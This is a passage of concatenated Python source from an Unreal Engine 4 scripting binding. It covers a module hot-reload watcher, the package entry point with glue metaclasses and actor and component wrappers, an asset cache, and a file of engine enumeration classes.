'MODULE_SOURCE_ROOTS', [])] if not self.sourceRoots: log('WARNING: dev module did not provide MODULE_SOURCE_ROOTS') self.mit.SetSourceRoots(self.sourceRoots) def Check(self, skipDevModuleReload=False, forceDevModuleReload=False): '''Called frequently to see if anything has happened. If skipDevModuleReload is True, then it won't get reloaded even if changes have been detected. 
forceDevModuleReload does the opposite - it forces the dev module to be reloaded even if no changes have been detected. (both of these options are for working with PIE)''' try: # TODO: make handling of devModule less special-case and reduce duplication below for first load vs reload # If we've never successfully loaded the module before, try to do so but don't spin like crazy now = time.time() if (not skipDevModuleReload) and (forceDevModuleReload or (not self.devModule and now >= self.nextFirstLoadTry)): # We haven't even imported it yet, at least not successfully try: self.mit.Reset(self.sourceRoots) m = sys.modules.get(self.devModuleName) if m: self.devModule = importlib.reload(m) else: self.devModule = importlib.import_module(self.devModuleName) self.UpdateSourceRoots() mi = self.mit.InfoFor(self.devModule) mi.CallModuleHook('OnModuleAfterReload', self, mi.savedState) except ModuleNotFoundError: # Same as below, but don't log a noisy error self.devModule = None self.nextFirstLoadTry = time.time() + 1 return except: self.devModule = None self.nextFirstLoadTry = time.time() + 1 logTB() log('ERROR: failed to load dev module', self.devModuleName) return reloadNames = self.mit.MarkReloadModules([self.devModuleName] if skipDevModuleReload else None) if reloadNames: reloadNames = self.mit.ReloadMarkedModules() # reloadNames originally was provisional and could have had duplicates, now has the actual list of what was reordered self.mit.Reset(self.sourceRoots) log('Reloaded modules', reloadNames) if self.devModuleName in reloadNames: self.devModule = sys.modules[self.devModuleName] self.UpdateSourceRoots() if self.devModule: self.mit.InfoFor(self.devModule) except: logTB() self.devModule = None if __name__ == '__main__': sw = SourceWatcher('scratchpad') while 1: sw.Check() time.sleep(0.25)
# --- repo: dfb/uepy — file: Content/Scripts/uepy/__init__.py ---
'''uepy package entry point: bridges the C++ `_uepy` binding module into Python, sets up stdout/stderr
redirection into the engine log, and defines the glue metaclasses / base classes that let Python
subclasses extend engine (UE4) classes.'''
from _uepy import *
from importlib import reload
import sys, shlex, json, time, weakref, inspect
from . import enums

# Capture sys.stdout/stderr
class OutRedir:
    '''File-like object that forwards writes to the engine log() (provided by _uepy)'''
    def write(self, buf): log(buf)
    def flush(self): pass
    def isatty(self): return False
sys.stdout = OutRedir()
sys.stderr = OutRedir()
del OutRedir

# some stuff for interactive
# NOTE(review): assumes __builtins__ is a dict here (true for imported modules, not for __main__) — confirm
__builtins__['reload'] = reload

class Bag(dict):
    '''A dict whose keys are also accessible as attributes, plus JSON (de)serialization helpers'''
    def __setattr__(self, k, v): self[k] = v
    def __getattr__(self, k):
        try:
            return self[k]
        except KeyError:
            raise AttributeError('No such attribute %r' % k)
    def __delattr__(self, k):
        try:
            del self[k]
        except KeyError:
            raise AttributeError('No such attribute %r' % k)
    @staticmethod
    def FromJSON(j):
        '''Parses a JSON string into nested Bag instances'''
        return json.loads(j, object_pairs_hook=Bag)
    def ToJSON(self, indent=0):
        '''Serializes to JSON; indent > 0 also sorts keys for a stable, readable dump'''
        if indent > 0:
            return json.dumps(self, indent=indent, sort_keys=True)
        return json.dumps(self)

# The command line args passed to UE4, not including "sys.argv[0]" (the application)
# NOTE: UE4 strips out quotes before it gets to any of our code, so pretty much anything with spaces in
# it will not work - you have to escape%20your%20parameters, unfortunately.
# TODO: stuff these into sys.argv?
# (commandLineRaw comes from the _uepy star import)
commandLineArgs = shlex.split(commandLineRaw)

def GetWorld():
    '''Returns the best guess of what the "current" world to use is'''
    WT = enums.EWorldType
    worlds = {} # worldType -> *first* world of that type
    for w in GetAllWorlds():
        t = w.WorldType
        if worlds.get(t) is None:
            worlds[t] = w
    # preference order: a real game world, then a play-in-editor world, then the editor world
    return worlds.get(WT.Game) or worlds.get(WT.PIE) or worlds.get(WT.Editor)

def GetUserID():
    '''Returns the session-unique user ID for the current user. User IDs are small integer values that
    are unique among the active users (i.e. if a client disconnects and a new client joins, it's
    possible that the new client will be assigned the old client's user ID).'''
    from . import netrep
    return netrep.GetUserID()

class Event:
    '''Utility class for firing events locally among objects. Convention is for objects to declare a
    public event member variable that other objects access directly to add/remove listener callbacks.
    User Add/Remove to register/unregister a function to be called when the event owner calls
    event.Fire. The signature of the event is up to the owner and supports args and kwargs. Callbacks
    are weak referenced and it is not required to Remove a registered callback, but it must be owned by
    an object (the callback function object must be a method bound to an object).'''
    def __init__(self):
        self.callbacks = [] # list of weakref.WeakMethod wrappers around bound-method listeners

    def Add(self, method):
        '''Registers a bound method to be called on Fire (held weakly)'''
        self.callbacks.append(weakref.WeakMethod(method))

    def Remove(self, method):
        '''Unregisters a previously added bound method; logs an error if it wasn't registered'''
        for i, ref in enumerate(self.callbacks):
            if ref() == method:
                self.callbacks.pop(i)
                return
        log('ERROR: failed to remove', method)

    def Fire(self, *args, **kwargs):
        '''Called by the owner to emit an event'''
        for methodRef in self.callbacks[:]: # iterate a copy since we may prune dead entries
            cb = methodRef()
            if not cb:
                self.callbacks.remove(methodRef)
            else:
                # Special case: if the owner of the callback is a Python wrapper for an engine object, it's possible that the
                # underlying engine object is no longer valid, but the engine hasn't run GC yet, so the Python object still exists,
                # so we need to detect that scenario and not call the callback.
                engineObj = getattr(cb.__self__, 'engineObj', None)
                if engineObj and not engineObj.IsValid():
                    self.callbacks.remove(methodRef)
                    continue
                try:
                    cb(*args, **kwargs)
                except:
                    logTB()

def DestroyAllActorsOfClass(klass):
    '''Destroys every actor of the given class in the current world'''
    for a in UGameplayStatics.GetAllActorsOfClass(GetWorld(), klass):
        a.Destroy()

def FindGlueClass(klass):
    '''Given a class object, returns it if it is a glue class. Otherwise, recursively checks each of
    its base classes until it finds a glue class, and returns it. Otherwise, returns None.'''
    bases = klass.__bases__
    for b in bases:
        # NOTE: if you reload(uepy) in the UE4 editor py console, this check will fail because you'll probably have multiple
        # versions of PyGlueMetaclass floating around - in that case, it's best to just restart UE4 for now. :(
        if type(b) is PyGlueMetaclass and b.__name__.endswith('_PGLUE'):
            return b

    # Keep looking
    for b in bases:
        g = FindGlueClass(b)
        if g is not None:
            return g
    return None

_allGlueClasses = {} # class name -> each glue class that has been defined
_allNonGlueClasses = {} # class name -> class object of all registered non-glue Python subclasses that extend engine classes
def GetPythonEngineSubclasses():
    '''Returns the registry of Python subclasses that extend engine classes'''
    return _allNonGlueClasses
def GetAllGlueClasses():
    '''Returns all glue classes that have been defined so far'''
    return list(_allGlueClasses.values())

def MergedClassDefaults(klass):
    '''Recursively merges all klass.classDefaults into a single dict and returns them'''
    ret = {}
    # walk bases in reverse so nearer classes override farther ones
    for base in klass.__bases__[::-1]:
        ret.update(MergedClassDefaults(base))
    ret.update(getattr(klass, 'classDefaults', {}))
    return ret

class NRTrackerMetaclass(type):
    '''Tracks all subclasses of NetReplicated.'''
    # Note that not all NetReplicated objects are engine objects
    All = {} # class name --> class instance
    def __new__(metaclass, name, bases, dct):
        klass = super().__new__(metaclass, name, bases, dct)
        if bases:
            NRTrackerMetaclass.All[klass.__name__] = klass # don't use name that was passed in, as PyGlueMetaclass modifies it
        return klass

MANGLE_CLASS_NAMES = True
class PyGlueMetaclass(NRTrackerMetaclass):
    '''Metaclass that registers Python subclasses of engine glue classes with UE4, wiring up the C++
    glue class, the generated engine UClass, and CDO defaults.'''
    def __new__(metaclass, name, bases, dct):
        isGlueClass = not bases # (a glue class has no bases)

        # Each UClass in UE4 has to have a unique name, but with separate directories, we could potentially have
        # a naming collision. So internally we name each class <objectLib>__<class>, which should be
        # sufficiently unique.
        if MANGLE_CLASS_NAMES and not isGlueClass and not dct.get('_uepy_no_mangle_name'):
            moduleName = dct.get('__module__')
            if moduleName:
                name = moduleName.replace('.', '__') + '__' + name

        newPyClass = super().__new__(metaclass, name, bases, dct)
        if isGlueClass:
            _allGlueClasses[name] = newPyClass
        else:
            _allNonGlueClasses[name] = newPyClass
            # A glue class has no base classes, so this class is /not/ a glue class, so we need to find its glue class
            # so that we can automatically cast its engineObj when creating instances.
            pyGlueClass = FindGlueClass(newPyClass)
            assert pyGlueClass is not None, 'Failed to find py glue class for ' + repr((name, bases))

            # We've found the Python side of the glue class, now get the C++ side as that's what we need to use to register
            # with the engine
            cppGlueClassName = pyGlueClass.__name__[:-6] + '_CGLUE' # strip the '_PGLUE' suffix
            if MANGLE_CLASS_NAMES:
                cppGlueClassName = cppGlueClassName.split('__')[-1]
            cppGlueClass = getattr(glueclasses, cppGlueClassName, None)
            assert cppGlueClass, 'Failed to find C++ glue class for ' + repr((name, bases))
            newPyClass.cppGlueClass = cppGlueClass

            # Register this class with UE4 so that BPs, the editor, the level, etc. can all refer to it by name
            interfaces = getattr(newPyClass, '__interfaces__', [])
            ec = newPyClass.engineClass = RegisterPythonSubclass(name, cppGlueClass.StaticClass(), newPyClass, interfaces)

            # Apply any CDO properties (in the py class's 'classDefaults' dict)
            if not hasattr(cppGlueClass, 'Cast'):
                log('WARNING: No Cast method found for', ec.GetName())
            else:
                cdo = cppGlueClass.Cast(ec.GetDefaultObject())
                for k, v in MergedClassDefaults(newPyClass).items():
                    try:
                        setattr(cdo, k, v)
                    except:
                        logTB()
                        log('Python class %s declares class default "%s" but setting the property failed' % (name, k))
        return newPyClass

    def __call__(cls, engineObj, *args, **kwargs):
        # Instead of requiring every subclass to take an engineObj parameter and then pass it to some super.__init__ function,
        # we intercept it, strip it out, and set it for them.
        inst = object.__new__(cls)

        # Before calling the Python constructor, we need to make sure that the pyInst member is set on the C++ side, because
        # it's possible that the __init__ function calls some C++ function that in turn tries to call one of the Python
        # instance's methods. But in order for that to work, pyInst has to be set at that point.
        InternalSetPyInst(engineObj, inst)

        # engineObj is right now just a plain UObject pointer from pybind's perspective, but we want it to be a pointer to
        # the glue class.
        inst.engineObj = cls.cppGlueClass.Cast(engineObj)
        try:
            inst.__init__(*args, **kwargs)
        except:
            logTB()
        return inst

def CPROPS(cls, *propNames):
    '''Creates Python read/write properties for C++ properties'''
    for _name in propNames:
        def setup(name):
            def _get(self): return getattr(self.engineObj, name)
            def _set(self, value): setattr(self.engineObj, name, value)
            setattr(cls, name, property(_get, _set))
        setup(_name) # create a closure so we don't lose the name

def BPPROPS(cls, *propNames):
    '''Creates Python read/write properties for BP (reflection system) properties'''
    for _name in propNames:
        def setup(name):
            def _get(self): return self.engineObj.Get(name)
            def _set(self, value): self.engineObj.Set(name, value)
            setattr(cls, name, property(_get, _set))
        setup(_name) # create a closure so we don't lose the name

def IsHost():
    '''Returns True if the current world is acting as the server'''
    return GetWorld().IsServer()

class AActor_PGLUE(metaclass=PyGlueMetaclass):
    '''Glue class for AActor'''
    repProps = Bag(
        loc = FVector(0,0,0),
        rot = FRotator(0,0,0),
    )

    def __init__(self):
        self.EndingPlay = Event() # fires (self) on EndPlay.
        super().__init__()

    def OnRep_loc(self): self.SetActorLocation(self.nr.loc)
    def OnRep_rot(self): self.SetActorRotation(self.nr.rot)
    def PostInitializeComponents(self): self.engineObj.SuperPostInitializeComponents()
    def GetName(self): return self.engineObj.GetName()
    def GetIsReplicated(self): return self.engineObj.GetIsReplicated()
    def SetReplicates(self, b): self.engineObj.SetReplicates(b)
    def HasLocalNetOwner(self): return self.engineObj.HasLocalNetOwner()
    def GetWorld(self): return self.engineObj.GetWorld()
    def GetOwner(self): return self.engineObj.GetOwner()
    def SetOwner(self, o): self.engineObj.SetOwner(o)
    def GetTransform(self): return self.engineObj.GetTransform()
    def SetActorLocation(self, v): self.engineObj.SetActorLocation(v) # this works because engineObj is a pointer to a real instance, and we will also write wrapper code to expose these APIs anyway
    def GetActorLocation(self): return self.engineObj.GetActorLocation()
    def GetActorRotation(self): return self.engineObj.GetActorRotation()
    def GetActorTransform(self): return self.engineObj.GetActorTransform()
    def SetActorRotation(self, r): self.engineObj.SetActorRotation(r)
    def GetActorScale3D(self): return self.engineObj.GetActorScale3D()
    def SetActorScale3D(self, s): self.engineObj.SetActorScale3D(s)
    def CreateUStaticMeshComponent(self, name): return self.engineObj.CreateUStaticMeshComponent(name)
    def GetRootComponent(self): return self.engineObj.GetRootComponent()
    def SetRootComponent(self, s): self.engineObj.SetRootComponent(s)
    def GetComponentsByClass(self, klass): return self.engineObj.GetComponentsByClass(klass)
    def IsValid(self): return self.engineObj.IsValid()
    def BeginPlay(self): self.engineObj.SuperBeginPlay()
    def EndPlay(self, reason):
        self.EndingPlay.Fire(self)
        self.engineObj.SuperEndPlay(reason)
    def Tick(self, dt): self.engineObj.SuperTick(dt)
    def HasAuthority(self): return self.engineObj.HasAuthority()
    def IsActorTickEnabled(self): return self.engineObj.IsActorTickEnabled()
    def SetActorTickEnabled(self, e): self.engineObj.SetActorTickEnabled(e)
    def SetActorTickInterval(self, i): self.engineObj.SetActorTickInterval(i)
    def GetActorTickInterval(self): return self.engineObj.GetActorTickInterval()
    def SetActorHiddenInGame(self, h): self.engineObj.SetActorHiddenInGame(h)
    def SetReplicateMovement(self, b): self.engineObj.SetReplicateMovement(b)
    def Destroy(self): return self.engineObj.Destroy()
    def BindOnEndPlay(self, cb): self.engineObj.BindOnEndPlay(cb) # NOTE: you may be better off using the EndingPlay Event instance.
    def UnbindOnEndPlay(self, cb): self.engineObj.UnbindOnEndPlay(cb)
    def Set(self, k, v): self.engineObj.Set(k, v)
    def Get(self, k): return self.engineObj.Get(k)
    def Call(self, funcName, *args): return self.engineObj.Call(funcName, *args)
    def UpdateTickSettings(self, canEverTick, startWithTickEnabled): self.engineObj.UpdateTickSettings(canEverTick, startWithTickEnabled)
    def OnReplicated(self): pass

    def GetFilteredComponents(self, ofClass=UPrimitiveComponent, onlyVisible=True, ignore=None, ignoreTag=None, includeAttachedActors=False):
        '''Returns a list of all of this actor's visible mesh component (including descendants) that are
        instances of the given component class (or one of its descendents). If ignore is provided, it
        should be a list of components to omit. If onlyVisible is True, excludes any hidden components.
        If includeAttachedActors is True, also return components of attached children actors.
        If ignoreTag is provided, any components that has that tag will be skipped.'''
        ret = []
        root = self.GetRootComponent()
        if not root:
            return ret
        thisActorAddr = AddressOf(self.engineObj)
        ignore = ignore or []
        ignore = [ofClass.Cast(x) for x in ignore] # this is so the check against the casted value works
        ignore = [x for x in ignore if x]
        # NOTE(review): ignoreTag is lowercased but ComponentTags entries are matched as-is, so a
        # mixed-case tag on a component will never match — confirm tags are stored lowercase
        ignoreTag = (ignoreTag or '').lower()
        for comp in root.GetChildrenComponents(True):
            if thisActorAddr != AddressOf(comp.GetOwner()) and not includeAttachedActors:
                continue
            if onlyVisible and not comp.IsVisible():
                continue
            if ignoreTag and ignoreTag in comp.ComponentTags:
                continue
            comp = ofClass.Cast(comp)
            if not comp:
                continue
            if comp in ignore:
                continue
            ret.append(comp)
        return ret

    @property
    def configStr(self):
        return self.engineObj.configStr
CPROPS(AActor_PGLUE, 'bAlwaysRelevant', 'bReplicates', 'Tags')

class APawn_PGLUE(AActor_PGLUE):
    '''Glue class for APawn'''
    def IsLocallyControlled(self): return self.engineObj.IsLocallyControlled()
    def SetupPlayerInputComponent(self, comp): self.engineObj.SuperSetupPlayerInputComponent(comp)
    def GetPlayerState(self): return self.engineObj.GetPlayerState()

class USceneComponent_PGLUE(metaclass=PyGlueMetaclass):
    '''Glue class for USceneComponent'''
    @classmethod
    def Cast(cls, obj): return cls.engineClass.Cast(obj)
    def IsValid(self): return self.engineObj.IsValid()
    def BeginPlay(self): self.engineObj.SuperBeginPlay()
    def EndPlay(self, reason): self.engineObj.SuperEndPlay(reason)
    def OnRegister(self): self.engineObj.SuperOnRegister()
    def ComponentHasTag(self, tag): return self.engineObj.ComponentHasTag(tag)
    def GetOwner(self): return self.engineObj.GetOwner()
    def GetName(self): return self.engineObj.GetName()
    def SetIsReplicated(self, r): self.engineObj.SetIsReplicated(r)
    def SetActive(self, a): self.engineObj.SetActive(a)
    def IsRegistered(self): return self.engineObj.IsRegistered()
    def RegisterComponent(self): self.engineObj.RegisterComponent()
    def UnregisterComponent(self): self.engineObj.UnregisterComponent()
    def DestroyComponent(self): self.engineObj.DestroyComponent()
    def GetRelativeLocation(self): return self.engineObj.GetRelativeLocation()
    def SetRelativeLocation(self, x): self.engineObj.SetRelativeLocation(x)
    def GetRelativeRotation(self): return self.engineObj.GetRelativeRotation()
    def SetRelativeRotation(self, x): self.engineObj.SetRelativeRotation(x)
    def GetRelativeScale3D(self): return self.engineObj.GetRelativeScale3D()
    def SetRelativeScale3D(self, x): self.engineObj.SetRelativeScale3D(x)
    def GetRelativeTransform(self): return self.engineObj.GetRelativeTransform()
    def SetRelativeTransform(self, x): self.engineObj.SetRelativeTransform(x)
    def SetRelativeLocationAndRotation(self, loc, rot): self.engineObj.SetRelativeLocationAndRotation(loc, rot)
    def ResetRelativeTransform(self): return self.engineObj.ResetRelativeTransform()
    def AttachToComponent(self, parent, socket=''): return self.engineObj.AttachToComponent(parent, socket)
    def SetupAttachment(self, parent, socket=''): return self.engineObj.SetupAttachment(parent, socket)
    def DetachFromComponent(self): return self.engineObj.DetachFromComponent()
    def SetVisibility(self, vis, propagate=True): self.engineObj.SetVisibility(vis, propagate)
    def IsVisible(self): return self.engineObj.IsVisible()
    def GetHiddenInGame(self): return self.engineObj.GetHiddenInGame()
    def SetHiddenInGame(self, h, propagate=True): self.engineObj.SetHiddenInGame(h, propagate)
    def GetForwardVector(self): return self.engineObj.GetForwardVector()
    def GetRightVector(self): return self.engineObj.GetRightVector()
    def GetUpVector(self): return self.engineObj.GetUpVector()
    def GetComponentLocation(self): return self.engineObj.GetComponentLocation()
    def GetComponentRotation(self): return self.engineObj.GetComponentRotation()
    def GetComponentQuat(self): return self.engineObj.GetComponentQuat()
    def GetComponentScale(self): return self.engineObj.GetComponentScale()
    def GetComponentToWorld(self): return self.engineObj.GetComponentToWorld()
    # NOTE(review): method is GetAttachParent but delegates to GetAttachedParent — looks like the C++
    # binding uses the latter name; confirm against the _uepy binding
    def GetAttachParent(self): return self.engineObj.GetAttachedParent()
    def GetChildrenComponents(self, includeAllDescendents): return self.engineObj.GetChildrenComponents(includeAllDescendents)
    def SetWorldLocation(self, x): self.engineObj.SetWorldLocation(x)
    def SetWorldRotation(self, x): self.engineObj.SetWorldRotation(x)
    def GetSocketTransform(self, name): return self.engineObj.GetSocketTransform(name)
    def GetSocketLocation(self, name): return self.engineObj.GetSocketLocation(name)
    def GetSocketRotation(self, name): return self.engineObj.GetSocketRotation(name)
    def CalcBounds(self, locToWorld): return self.engineObj.CalcBounds(locToWorld)
    def SetMobility(self, m): self.engineObj.SetMobility(m)
CPROPS(USceneComponent_PGLUE, 'ComponentTags')

class UBoxComponent_PGLUE(USceneComponent_PGLUE):
    '''Glue class for UBoxComponent'''
    def SetCollisionEnabled(self, e): self.engineObj.SetCollisionEnabled(e) # this is actually from UPrimitiveComponent
    def BeginPlay(self): self.engineObj.SuperBeginPlay()
    def EndPlay(self, reason): self.engineObj.SuperEndPlay(reason)
    def OnRegister(self): self.engineObj.SuperOnRegister()
    def SetBoxExtent(self, e): self.engineObj.SetBoxExtent(e)
    def GetUnscaledBoxExtent(self): return self.engineObj.GetUnscaledBoxExtent()

class UEPYAssistantActor(AActor_PGLUE):
    '''Spawn one of these into a level to have it watch for source code changes and automatically
    reload modified code.'''
    def __init__(self):
        self.SetReplicates(False)
        super().__init__()
        self.SetActorTickEnabled(True)
        self.lastCheck = 0 # timestamp of the last sourcewatcher poll
        self.watcher = None # the sourcewatcher.SourceWatcher instance, created lazily in Tick
        self.forceDevModuleReload = True

    def BeginPlay(self):
        super().BeginPlay()
        self.start = time.time()

    def Tick(self, dt):
        now = time.time()
        if self.watcher is None:
            import sourcewatcher as S
            # wait a beat after BeginPlay before hooking up, so a global watcher has a chance to exist
            if now-self.start > 1:
                # Try to grab a global sourcewatcher that already exists
                self.watcher = S.GetGlobalInstance()
                if self.watcher is None:
                    log('Starting new source watcher')
                    S.log = log # patch sourcewatcher's loggers to go to the engine log
                    S.logTB = logTB
                    self.watcher = S.SourceWatcher()
                else:
                    log('Reusing global source watcher')
        elif now-self.lastCheck > 0.25:
            self.watcher.Check(forceDevModuleReload=self.forceDevModuleReload)
            self.forceDevModuleReload = False # we just want to force scratchpad to reload on start
            self.lastCheck = time.time()

def AddHelper():
    '''Convenience: spawns a UEPYAssistantActor into the current world'''
    SpawnActor(GetWorld(), UEPYAssistantActor)

class UUserWidget_PGLUE(metaclass=PyGlueMetaclass):
    '''Glue base class of Python subclasses of the UUserWidget-derived C++ glue class'''
    # TODO: why doesn't this live in umg.py?
    # We do not implement a default Tick but instead have the C++ only call into Python if a Tick function is defined
    #def Tick(self, geometry, dt): pass

def SpawnActor(world, klass, location=None, rotation=None, **kwargs):
    '''Extends __uepy.SpawnActor_ so that you can also pass in values for any UPROPERTY fields'''
    if location is None: location = FVector(0,0,0)
    if rotation is None: rotation = FRotator(0,0,0)
    return SpawnActor_(world, klass, location, rotation, kwargs)

class RefCache:
    '''Asset loader. Repeated calls to load the same asset will be fast because previous loads are
    cached. All assets are loaded by their UE4 editor reference string (right-click on asset and
    choose to copy the reference).'''
    def __init__(self):
        self.cache = {} # editor reference string --> loaded instance of an asset

        # prefix portion of the editor reference string; each type a new type of asset is loaded, an entry is added to the map.
        # In most cases, the prefix is the class name without the U prefix (e.g. a 'PaperSprite' --> UPaperSprite), but any
        # special cases should be added to the initial values below.
        self.classMap = dict(
            Blueprint=UBlueprintGeneratedClass,
            MaterialInstanceConstant=UMaterialInstance,
            WidgetBlueprint=UBlueprintGeneratedClass,
        )

    def Load(self, ref):
        '''Given an editor reference string, returns the cached asset, loading it if needed. Returns
        None if it can't be loaded.'''
        # TODO: UE4 often seems to blur the lines between assets that are classes for generating stuff and assets that are stuff,
        # and that blurriness carries over to this function. We might want to someday have e.g. LoadClassByRef and LoadObjectByRef
        # functions to make the caller's intentions more explicit. Or maybe it never really matters.
        obj = self.cache.get(ref)
        if obj is not None:
            # cache hit!
            return obj

        objType, path, ignore = ref.split("'") # it's something like Blueprint'/Game/Path/To/Some/Object'

        # Find the UE4 class for this reference, trying to auto-discover it this is the first encounter
        cls = self.classMap.get(objType)
        if cls is None:
            cls = globals().get('U' + objType)
            if cls is not None:
                self.classMap[objType] = cls # yay, remember for next time
        if cls is None:
            raise Exception('RefCache cannot handle references of type ' + repr(objType))

        if cls == UBlueprintGeneratedClass and not path.endswith('_C'):
            # The UE4 reference will be like "Blueprint'/Game/Whatever'" but we want the class that the BP generates
            path += '_C'
        obj = StaticLoadObject(cls, path)
        if obj is not None:
            if cls != UBlueprintGeneratedClass: # if we cast these, it breaks stuff because the result isn't what we want
                obj = cls.Cast(obj)
            self.cache[ref] = obj
        return obj

    def Clear(self):
        '''Removes from memory all cached references'''
        self.cache.clear()

    def GetReferencePath(self, obj):
        '''Given an asset, such as a UMaterialInstance, returns a reference path for it, in the same
        format as right-clicking an asset in the editor and choosing "Copy Reference"'''
        className = obj.GetClass().GetName()
        classPath = obj.GetPathName()
        if className.endswith('GeneratedClass') and classPath.endswith('_C'):
            className = className[:-len('GeneratedClass')]
            classPath = classPath[:-2]
        return "%s'%s'" % (className, classPath)

# global ref cache
_refCache = RefCache()
LoadByRef = _refCache.Load
ClearRefCache = _refCache.Clear
GetReferencePath = _refCache.GetReferencePath

def Caller(level=2):
    '''Debugging helper - returns info on the call stack (default=who called the caller of the caller)'''
    frame = inspect.stack()[level]
    return '[%s:%d]' % (frame.function, frame.lineno)
# --- repo: dfb/uepy — file: Content/Scripts/uepy/enums.py ---
'''
Engine enumerations exposed to Python, along with a base enum class that adds a reverse mapping
(value-to-name) API.
'''

class EnumMeta(type):
    '''Metaclass used by Enum: builds the value->name reverse map and lowercase aliases.'''
    def __new__(metaclass, name, bases, dct):
        # Create an inverse mapping of values to name - note that in the case of multiple names mapping to
        # the same value, you can't know which one will be returned when NameFor is called.
        inverse = {}
        for k,v in dct.items():
            if type(v) is int:
                inverse[v] = k
        dct['_inverse'] = inverse

        # Also make each enum accessible as a purely lowercase name to aid in translating user input (or
        # some other source that may not know the proper capitalization) to enum values
        for v,k in inverse.items():
            dct[k.lower()] = v
        return super().__new__(metaclass, name, bases, dct)

class Enum(metaclass=EnumMeta):
    '''Base class for all Enums we expose to Python'''
    @classmethod
    def NameFor(cls, v):
        '''Given an enum value, returns the string name of that value'''
        return cls._inverse[v]

    @classmethod
    def Inverse(cls):
        '''Returns a mapping of enum value --> name'''
        return cls._inverse

    @classmethod
    def Values(cls):
        '''Returns a list of all of the enum's values'''
        return list(cls._inverse.keys())

class EForceInit(Enum):
    ForceInit, ForceInitToZero = range(2)

class EEngineMode(Enum):
    '''Tells which mode we're in right now'''
    Unknown, Build, SrcCLI, Editor, PIE = range(5)

class EWorldType(Enum):
    NONE, Game, Editor, PIE, EditorPreview, GamePreview, Inactive = range(7)

class EHorizontalAlignment(Enum):
    HAlign_Fill = Fill = 0
    HAlign_Left = Left = 1
    HAlign_Center = Center = 2
    HAlign_Right = Right = 3

class EVerticalAlignment(Enum):
    VAlign_Fill = Fill = 0
    VAlign_Top = Top = 1
    VAlign_Center = Center = 2
    VAlign_Bottom = Bottom = 3

class ECollisionChannel(Enum):
    ECC_WorldStatic, ECC_WorldDynamic, ECC_Pawn, ECC_Visibility, ECC_Camera, ECC_PhysicsBody,\
    ECC_Vehicle, ECC_Destructible, ECC_EngineTraceChannel1, ECC_EngineTraceChannel2,\
    ECC_EngineTraceChannel3, ECC_EngineTraceChannel4, ECC_EngineTraceChannel5, ECC_EngineTraceChannel6,\
    ECC_GameTraceChannel1, ECC_GameTraceChannel2, ECC_GameTraceChannel3, ECC_GameTraceChannel4,\
    ECC_GameTraceChannel5, ECC_GameTraceChannel6, ECC_GameTraceChannel7, ECC_GameTraceChannel8,\
    ECC_GameTraceChannel9, ECC_GameTraceChannel10, ECC_GameTraceChannel11, ECC_GameTraceChannel12,\
    ECC_GameTraceChannel13, ECC_GameTraceChannel14, ECC_GameTraceChannel15, ECC_GameTraceChannel16,\
    ECC_GameTraceChannel17, ECC_GameTraceChannel18 = range(32)

class ECollisionEnabled(Enum):
    NoCollision, QueryOnly, PhysicsOnly, QueryAndPhysics = range(4)

class ECollisionResponse(Enum):
    ECR_Ignore, ECR_Overlap, ECR_Block = range(3)
    Ignore = ECR_Ignore
    Overlap = ECR_Overlap
    Block = ECR_Block

class EEasingFunc(Enum):
    Linear, Step, SinusoidalIn, SinusoidalOut, SinusoidalInOut, EaseIn, EaseOut, EaseInOut,\
    ExpoIn, ExpoOut, ExpoInOut, CircularIn, CircularOut, CircularInOut = range(14)

class EDrawDebugTrace(Enum):
    NONE, ForOneFrame, ForDuration, Persistent = range(4)

class EHMDTrackingOrigin(Enum):
    Floor, Eye, Stage = range(3)

class ESlateColorStylingMode(Enum):
    UseColor_Specified, UseColor_Specified_Link, UseColor_Foreground, UseColor_Foreground_Subdued = range(4)

class ESlateVisibility(Enum):
    Visible, Collapsed, Hidden, HitTestInvisible, SelfHitTestInvisible = range(5)

class ESlateSizeRule(Enum):
    Automatic, Fill = range(2)

class ETextJustify(Enum):
    Left, Center, Right = range(3)

class EOrientation(Enum):
    Orient_Horizontal, Orient_Vertical = range(2)
    Horizontal, Vertical = Orient_Horizontal, Orient_Vertical

class EControllerHand(Enum):
    Left, Right, AnyHand = range(3)

class ELightUnits(Enum):
    Unitless, Candelas, Lumens = range(3)

class ESceneCaptureSource(Enum):
    SCS_SceneColorHDR, SCS_SceneColorHDRNoAlpha, SCS_FinalColorLDR, SCS_SceneColorSceneDepth,\
    SCS_SceneDepth, SCS_DeviceDepth, SCS_Normal, SCS_BaseColor, SCS_FinalColorHDR = range(9)

class EVisibilityPropagation(Enum):
    NoPropagation, DirtyOnly, Propagate = range(3)

# FIX: these two previously did not subclass Enum, unlike every other enumeration in this
# module, so they lacked NameFor/Inverse/Values and the lowercase aliases. The integer
# values are unchanged, so existing callers are unaffected.
class EStretchDirection(Enum):
    Both, DownOnly, UpOnly = range(3)

class EStretch(Enum):
    NONE, Fill, ScaleToFit, ScaleToFitX, ScaleToFitY, ScaleToFill, ScaleBySafeZone, UserSpecified = range(8)

class EInputEvent(Enum):
    IE_Pressed, IE_Released, IE_Repeat, IE_DoubleClick, IE_Axis, IE_MAX = range(6)

# Who is in charge of replicating the act of spawning a particular object
class ENRSpawnReplicatedBy(Enum):
    NONE, App, Engine, NR = range(4)

class ENRWhere(Enum):
    NONE, Local, Host, NotMe = [0,1,2,4] # bit flags, hence the gap
    All = Local|Host|NotMe
    USER = 128 # special flag indicating the lower 7 bits are a user ID
    def Only(self, userID):
        '''Helper to create a value that means "send this message only to a specific user"'''
        # NOTE(review): takes self but these enum classes are never instantiated here;
        # presumably invoked with the class (or an instance created elsewhere) - verify at call sites.
        assert userID < 128, userID
        return userID | self.USER

class EWidgetSpace(Enum):
    World, Screen = range(2)

class EWidgetGeometryMode(Enum):
    Plane, Cylinder = range(2)

class EWidgetInteractionSource(Enum):
    World, Mouse, CenterScreen, Custom = range(4)

class ESplineCoordinateSpace(Enum):
    Local, World = range(2)

class ESplinePointType(Enum):
    Linear, Curve, Constant, CurveClamped, CurveCustomTangent = range(5)

class EComponentMobility(Enum):
    Static, Stationary, Movable = range(3)

class ERelativeTransformSpace(Enum):
    RTS_World, RTS_Actor, RTS_Component, RTS_ParentBoneSpace = range(4)

class EOnJoinSessionCompleteResult(Enum):
    Success, SessionIsFull, SessionDoesNotExist, CouldNotRetrieveAddress, AlreadyInSession, UnknownError = range(6)

# this is a made-up enum since we don't yet expose FAttachmentTransformRules
class EAttachmentTransformRule(Enum):
    KeepRelativeTransform, KeepWorldTransform = range(2)

class ESkyLightSourceType(Enum):
    SLS_CapturedScene, SLS_SpecifiedCubemap = range(2)
dfb/uepy
Content/Scripts/uepy/rrepl.py
'''
